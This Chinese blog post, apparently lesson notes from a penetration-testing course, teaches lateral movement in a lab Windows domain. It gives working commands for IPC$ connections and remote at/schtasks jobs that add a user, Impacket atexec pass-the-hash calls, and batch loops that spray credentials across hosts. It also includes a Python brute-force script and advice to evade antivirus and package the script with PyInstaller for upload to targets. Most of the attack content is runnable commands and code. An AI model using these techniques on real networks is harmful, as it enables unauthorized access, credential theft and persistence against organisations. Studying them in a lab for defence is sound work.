<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="66-内网安全-域横向批量at&amp;schtasks&amp;impacket">
<meta property="og:type" content="article">
<meta property="og:title" content="66-内网安全-域横向批量at&amp;schtasks&amp;impacket">
<meta property="og:url" content="http://example.com/2023/05/04/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/66-%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%9F%E6%A8%AA%E5%90%91%E6%89%B9%E9%87%8Fat&schtasks&impacket/index.html">
<meta property="og:site_name" content="HVVL404">
<meta property="og:description" content="66-内网安全-域横向批量at&amp;schtasks&amp;impacket">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-1.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-2.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-3.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-4.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-5.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-6.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-7.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-8.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-9.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-10.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-11.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-12.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-13.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-14.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-15.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-16.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-17.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-18.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-19.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-20.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-21.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-22.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-23.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-24.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-25.png">
<meta property="og:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-26.png">
<meta property="article:published_time" content="2023-05-04T09:44:20.007Z">
<meta property="article:modified_time" content="2023-05-06T16:07:00.284Z">
<meta property="article:author" content="HVVL404">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/%5Cimages%5Cxiaodi%5C66-1.png">

<link rel="canonical" href="http://example.com/2023/05/04/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/66-%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%9F%E6%A8%AA%E5%90%91%E6%89%B9%E9%87%8Fat&schtasks&impacket/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>66-内网安全-域横向批量at&schtasks&impacket | HVVL404</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">HVVL404</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="house fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="categories fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/05/04/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/66-%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%9F%E6%A8%AA%E5%90%91%E6%89%B9%E9%87%8Fat&schtasks&impacket/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="HVVL404">
      <meta itemprop="description" content="欢迎来到我的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="HVVL404">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          66-内网安全-域横向批量at&schtasks&impacket
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-05-04 17:44:20" itemprop="dateCreated datePublished" datetime="2023-05-04T17:44:20+08:00">2023-05-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-05-07 00:07:00" itemprop="dateModified" datetime="2023-05-07T00:07:00+08:00">2023-05-07</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/" itemprop="url" rel="index"><span itemprop="name">小迪安全（内网篇）</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>66-内网安全-域横向批量at&amp;schtasks&amp;impacket</p>
<span id="more"></span>

<p>思维导图</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-1.png" alt="66-1"></p>
<p>本课重点</p>
<ul>
<li>案例1：横向渗透明文传递</li>
<li>案例2：横向渗透明文HASH传递atexec-impacket</li>
<li>案例3：横向渗透明文HASH传递批量利用-综合</li>
<li>案例4：横向渗透明文HASH传递批量利用-升级版</li>
</ul>
<p>环境准备</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-2.png" alt="66-2"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">2008 r2 webserver 域内web服务器</span><br><span class="line">本地管理员账号密码: .\administraotr:admin!@#45</span><br><span class="line">当前机器域用户密码: god\webadmin:admin!@#45</span><br><span class="line"> </span><br><span class="line">2003 x86 fileserver 域内文件服务器</span><br><span class="line">本地管理员账号密码：administrator:admin</span><br><span class="line">当前机器域用户密码: god\fileadmin:Admin12345</span><br><span class="line"> </span><br><span class="line">2008 r2 x64 dc god.org 主域控机器</span><br><span class="line">域管账号密码: God\administrator:Admin12345</span><br><span class="line"> </span><br><span class="line">2012 sqlserver 域内数据库服务器</span><br><span class="line">本地管理员账号密码：.\administrator:admin!@#45</span><br><span class="line">当前机器域用户密码：god\dbadmin:admin!@#45</span><br><span class="line"> </span><br><span class="line">w7 x64 mary-pc 域内个人机</span><br><span class="line">本地管理员账号密码：.\mary:admin</span><br><span class="line">当前机器域用户密码：god\mary:admin!@#45</span><br><span class="line"> </span><br><span class="line">w8.1 x64 jack-pc 域内个人机</span><br><span class="line">本地管理员账号密码：.\jack:admin</span><br><span class="line">当前机器域用户密码：god\boss:Admin12345</span><br></pre></td></tr></table></figure>

<p><strong>案例1：横向渗透明文传递</strong></p>
<p>在拿下一台内网主机，通过本地信息搜集收集用户凭据等信息后，如何横向渗透拿下更多的主机？这里仅介绍at&amp;schtasks命令的使用，在已知目标系统的用户明文密码的基础上，直接可在远程主机上执行命令。</p>
<p>获取到某域主机权限-&gt;  minikatz得到密码（明文，hash）-&gt;用到信息收集里面域用户的列表当做用户名字典-&gt;用到密码明文当做字典-&gt;尝试连接-&gt;创建计划任务（at|schtasks）-&gt;执行文件可为后门或者相关命令</p>
<p>IPC（ Internet Process Connection）是共享“命名管道”的资管，它是为了让进城间通信而开放的命名管道，可以通过验证用户名和密码获得相关的权限，在远程管路计算机和查看计算机的共享资源时使用。</p>
<p>利用流程：</p>
<ul>
<li>1.建立IPC链接到目标主机</li>
<li>2.拷贝要执行的命令脚本到目标主机</li>
<li>3.查看目标时间，创建计划任务（ at,schtasks ）定时执行拷贝到的脚本</li>
<li>4.删除IPC链接</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">net use \\server\ipc$&quot;password&quot; /user:username # 工作组</span><br><span class="line">net use \\server\ipc$&quot;password&quot; /user:domain\username #域内</span><br><span class="line">dir \\xx.xx.xx.xx\C$\                # 查看文件列表</span><br><span class="line">copy \\xx.xx.xx.xx\C$\1.bat 1.bat  # 下载文件</span><br><span class="line">copy 1.bat \\xx.xx.xx.xx\C$  # 复制文件</span><br><span class="line">net use \\xx.xx.xx.xx\C$\1.bat /del  # 删除文件</span><br><span class="line">net use \\xx.xx.xx.xx\ipc$ \del     # 删除IPC</span><br><span class="line">net view xx.xx.xx.xx                # 查看对方共享</span><br></pre></td></tr></table></figure>

<p>建立IPC常见的错误代码</p>
<ul>
<li>(1) 5：拒绝访问，可能是使用的不是管理员权限，需要先提升权限</li>
<li>(2) 51：网络问题，windoows无法找到网络路径</li>
<li>(3) 53：找不到网站路径，可能是IP地址错误，目标未开机，目标Lanmanserver服务未启动、有防火墙等问题</li>
<li>(4) 67：找不到网络名，本地Lanmanworkstation服务未启动，目标删除ipc$</li>
<li>(5) 1219：提供的凭据和已存在的凭据集冲突，说明已建立IPC$，需要先删除</li>
<li>(6) 1326：账号密码错误</li>
<li>(7) 1792：目标NetLogon服务未启动，连接域控常常会出现此情况</li>
<li>(8) 2242：用户密码过期，目标有账号策略，强制定期更改密码</li>
</ul>
<p>建立IPC失败的原因</p>
<ul>
<li>(1) 目标系统不是NT或以上的操作系统</li>
<li>(2) 对方没有打开IPC$共享</li>
<li>(3) 对方未开启139,445端口，或者被防火墙屏蔽</li>
<li>(4) 输出命令，账号密码有错误</li>
</ul>
<p>[at] &amp; [schtasks]</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#at &lt; Windows2012</span><br><span class="line">net use \\192.168.3.21\ipc$ &quot;Admin12345&quot; /user:god.org\administrator # 建立ipc连接</span><br><span class="line">copy add.bat \192.168.3.21\c$  #拷贝执行文件到目标机器</span><br><span class="line">at \\192.168.3.21 15:47 c:\add.bat    #添加计划任务</span><br><span class="line"> </span><br><span class="line">schtasks &gt;=Windows2012</span><br><span class="line">net use \\192.168.3.32\ipc$ &quot;admin!@#45&quot; /user:god.org\administrator # 建立ipc连接</span><br><span class="line">copy add.bat \\192.168.3.32\c$ #复制文件到其C盘</span><br><span class="line">schtasks /create /s 192.168.3.32 /ru &quot;SYSTEM&quot; /tn adduser /sc DAILY /tr c:\add.bat /F #创建adduser任务对应执行文件</span><br><span class="line">schtasks /run /s 192.168.3.32 /tn adduser /i #运行adduser任务</span><br><span class="line">schtasks /delete /s 192.168.3.21 /tn adduser /f#删除adduser任务</span><br></pre></td></tr></table></figure>

<p>案例演示</p>
<p>&lt;1&gt;获取到DC的IP地址。执行以下两个命令时，需要域用户登录，而不是本地用户登录</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-3.png" alt="66-3"></p>
<p>&lt;2&gt;假设已经找到DC的用户名密码（具体后面再详细讲）</p>
<p>&lt;3&gt;横向渗透</p>
<p>由于域控DC是Win2008R2（&lt; Windows2012），可以使用at命令。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">net use \\192.168.3.21\ipc$ &quot;Admin12345&quot; /user:god.org\administrator # 建立ipc连接</span><br><span class="line">copy add.bat \192.168.3.21\c$ #拷贝执行文件到目标机器</span><br><span class="line">at \\192.168.3.21 15:47 c:\add.bat #添加计划任务</span><br></pre></td></tr></table></figure>

<p><img src="/%5Cimages%5Cxiaodi%5C66-4.png" alt="66-4"></p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-5.png" alt="66-5"></p>
<p>一段时候后，xiaodi用户就自动添加成功了。</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-6.png" alt="66-6"></p>
<p>&lt;4&gt;如果目标计算机&gt;&#x3D;Windows2012，需要使用schtasks命令。</p>
<p>比如前期信息收集得到了sqlserver的用户名密码，SqlServer是window2012系统。</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-7.png" alt="66-7"></p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-8.png" alt="66-8"></p>
<p>如下图，当使用域用户登录时，copy是失败的，原因是权限不够，应该使用本地用户登录。</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-9.png" alt="66-9"></p>
<p>使用本地用户登录，执行如下命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">net use \\192.168.3.32\ipc$ &quot;admin!@#45&quot; /user:god.org\administrator # 建立ipc连接</span><br><span class="line">copy add.bat \\192.168.3.32\c$ #复制文件到其C盘</span><br><span class="line">schtasks /create /s 192.168.3.32 /ru &quot;SYSTEM&quot; /tn adduser /sc DAILY /tr c:\add.bat /F #创建adduser任务对应执行文件</span><br><span class="line">schtasks /run /s 192.168.3.32 /tn adduser /i #运行adduser任务</span><br><span class="line">schtasks /delete /s 192.168.3.21 /tn adduser /f#删除adduser任务</span><br></pre></td></tr></table></figure>

<p><img src="/%5Cimages%5Cxiaodi%5C66-10.png" alt="66-10"></p>
<p>等待一段时间，成功添加新用户。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">net user 查看用户中是否多了一个xiaodi</span><br><span class="line">net user xiaodi 查看xiaodi账户创建时间是否为刚才计划任务的时间</span><br><span class="line">net user xiaodi /del 不需要了的话可以删除</span><br></pre></td></tr></table></figure>

<p><img src="/%5Cimages%5Cxiaodi%5C66-11.png" alt="66-11"></p>
<p><strong>案例2：横向渗透明文HASH传递atexec-impacket</strong></p>
<p>atexec</p>
<ul>
<li>优点：一句话命令，连接、提权全部搞定。</li>
<li>缺点：第三方工具，非微软官方工具，易被杀毒软件查杀，实战中需要自己做一下免杀。</li>
<li>atexec是Impacket网络协议工具包中的一个工具。Impacket工具包介绍：<a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/175208.html">https://www.freebuf.com/sectool/175208.html</a></li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">atexec.exe ./administrator:Admin12345@192.168.3.21 &quot;whoami&quot;</span><br><span class="line">atexec.exe god/administrator:Admin12345@192.168.3.21 &quot;whoami&quot;</span><br><span class="line">atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 &quot;whoami&quot;</span><br></pre></td></tr></table></figure>

<p>案例演示</p>
<p>&lt;1&gt;impacket工具包下载，可下载exe版本</p>
<ul>
<li>地址：<a target="_blank" rel="noopener" href="https://gitee.com/RichChigga/impacket-examples-windows">https://gitee.com/RichChigga/impacket-examples-windows</a></li>
</ul>
<p><img src="/%5Cimages%5Cxiaodi%5C66-12.png" alt="66-12"></p>
<p>&lt;2&gt;执行命令，直接提权</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-13.png" alt="66-13"></p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-14.png" alt="66-14"></p>
<p><strong>案例3：横向渗透明文HASH传递批量利用-综合</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">FOR /F %%i in (ips.txt) do net use \%%i\ipc$ &quot;admin!@#45&quot; /user:administrator #批量检测IP对应明文连接</span><br><span class="line">FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测IP对应明文回显版</span><br><span class="line">FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量检测明文对应IP回显版</span><br><span class="line">FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量检测HASH对应IP回显版</span><br></pre></td></tr></table></figure>

<p>&lt;1&gt;websever登录，运行mimikatz，得到用户名密码。</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-15.png" alt="66-15"></p>
<p>&lt;2&gt;用微软自带命令探测网段存活主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr &quot;TTL =&quot; 自带内部命令（推荐使用）</span><br></pre></td></tr></table></figure>

<p><img src="/%5Cimages%5Cxiaodi%5C66-16.png" alt="66-16"></p>
<p>&lt;3&gt;批量检测IP对应明文连接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">FOR /F %%i in (ips.txt) do net use \%%i\ipc$ &quot;admin!@#45&quot; /user:administrator #批量检测IP对应明文连接</span><br></pre></td></tr></table></figure>

<p><img src="/%5Cimages%5Cxiaodi%5C66-17.png" alt="66-17"></p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-18.png" alt="66-18"></p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-19.png" alt="66-19"></p>
<p>发现网段内另一台主机192.168.3.29（jack-pc）与webserver用了相同的账户密码，并且可以直接提权到system权限。</p>
<p>&lt;4&gt;在jack-pc上运行mimikatz，获取到另一个账户密码。</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-20.png" alt="66-20"></p>
<p>&lt;5&gt;接下来，可以使用新密码继续批量检测IP对应明文。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测IP对应明文回显版</span><br></pre></td></tr></table></figure>

<p><img src="/%5Cimages%5Cxiaodi%5C66-21.png" alt="66-21"></p>
<p>执行at_ip.bat，发现192,.168.3.21也用了该密码，而它正好就是域控！</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-22.png" alt="66-22"></p>
<p>&lt;6&gt;或者可以采用另一种方法，由于此时我们已经拿到了2个真实的账号密码，可以写一个字典表，直接去探测域控。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量检测明文对应IP回显版</span><br><span class="line">FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量检测HASH对应IP回显版</span><br></pre></td></tr></table></figure>

<p><img src="/%5Cimages%5Cxiaodi%5C66-23.png" alt="66-23"></p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-24.png" alt="66-24"></p>
<p>执行at_ip.bat，找到了域控192,.168.3.21的密码！直接提权！</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-25.png" alt="66-25"></p>
<p>当然了，这是我们测试环境，实战中一般没这么快！至少需要很多轮的信息收集，才能逐渐靠近域控。</p>
<p><strong>案例4：横向渗透明文HASH传递批量利用-升级版</strong></p>
<p>前期除了收集明文密码HASH等，还收集了用户名，用户名配合密码字典能吃西瓜？</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use \192.168.3.32\ipc$ admin!@#45 /user:god\dbadmin</span><br></pre></td></tr></table></figure>

<p>案例3中都是批处理命令，只能遍历一个变量（不知道可不可遍历2个变量，反正我不会写），如果想要遍历多个变量，比如IP、用户名、密码等，可以写python脚本，免杀，使用Pyinstaller打包成exe文件，上传到目标机器运行。</p>
<p>脚本（最好写成多线程的）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">import os,time</span><br><span class="line">ips=&#123;</span><br><span class="line">   &#x27;192.168.3.21&#x27;,</span><br><span class="line">   &#x27;192.168.3.25&#x27;,</span><br><span class="line">   &#x27;192.168.3.29&#x27;,</span><br><span class="line">   &#x27;192.168.3.30&#x27;,</span><br><span class="line">   &#x27;192.168.3.31&#x27;,</span><br><span class="line">   &#x27;192.168.3.33&#x27;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">users=&#123;</span><br><span class="line">   &#x27;Administrator&#x27;,</span><br><span class="line">   &#x27;boss&#x27;,</span><br><span class="line">   &#x27;dbadmin&#x27;,</span><br><span class="line">   &#x27;fileadmin&#x27;,</span><br><span class="line">   &#x27;mack&#x27;,</span><br><span class="line">   &#x27;mary&#x27;,</span><br><span class="line">   &#x27;vpnadm&#x27;,</span><br><span class="line">   &#x27;webadmin&#x27;</span><br><span class="line">&#125;</span><br><span class="line">passs=&#123;</span><br><span class="line">   &#x27;admin&#x27;,</span><br><span class="line">   &#x27;admin!@#45&#x27;,</span><br><span class="line">   &#x27;Admin12345&#x27;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">for ip in ips:</span><br><span class="line">   for user in users:</span><br><span class="line">       for mima in passs:</span><br><span class="line">           exec=&quot;net use \&quot;+ &quot;\&quot;+ip+&#x27;\ipc$ &#x27;+mima+&#x27; /user:god\&#x27;+user</span><br><span class="line">           print(&#x27;---&gt;&#x27;+exec+&#x27;&lt;---&#x27;)</span><br><span class="line">           os.system(exec)</span><br><span class="line">           time.sleep(1)</span><br></pre></td></tr></table></figure>

<p>编译</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pip install pyinstaller</span><br><span class="line">pyinstaller -F fuck_neiwang_001.py 生成可执行EXE</span><br></pre></td></tr></table></figure>

<p>案例演示</p>
<p>&lt;1&gt;首先，查看网络连接，此时结果是空的，没有连接；然后运行exe文件，结束后再次查看网络连接，发现连接上了5台主机。</p>
<p><img src="/%5Cimages%5Cxiaodi%5C66-26.png" alt="66-26"></p>
<p>&lt;2&gt;接下来，拷贝执行文件到目标主机，执行at或者schtasks命令创建任务即可。</p>

    </div>

    
    
    
	
        <div class="reward-container">
  <div>原创技术分享，您的支持将鼓励我继续创作</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.png" alt="HVVL404 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.png" alt="HVVL404 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>HVVL404
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2023/05/04/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%EF%BC%88%E5%86%85%E7%BD%91%E7%AF%87%EF%BC%89/66-%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%9F%E6%A8%AA%E5%90%91%E6%89%B9%E9%87%8Fat&schtasks&impacket/" title="66-内网安全-域横向批量at&amp;schtasks&amp;impacket">http://example.com/2023/05/04/小迪安全（内网篇）/66-内网安全-域横向批量at&schtasks&impacket/</a>
  </li>
  <li class="post-copyright-license">
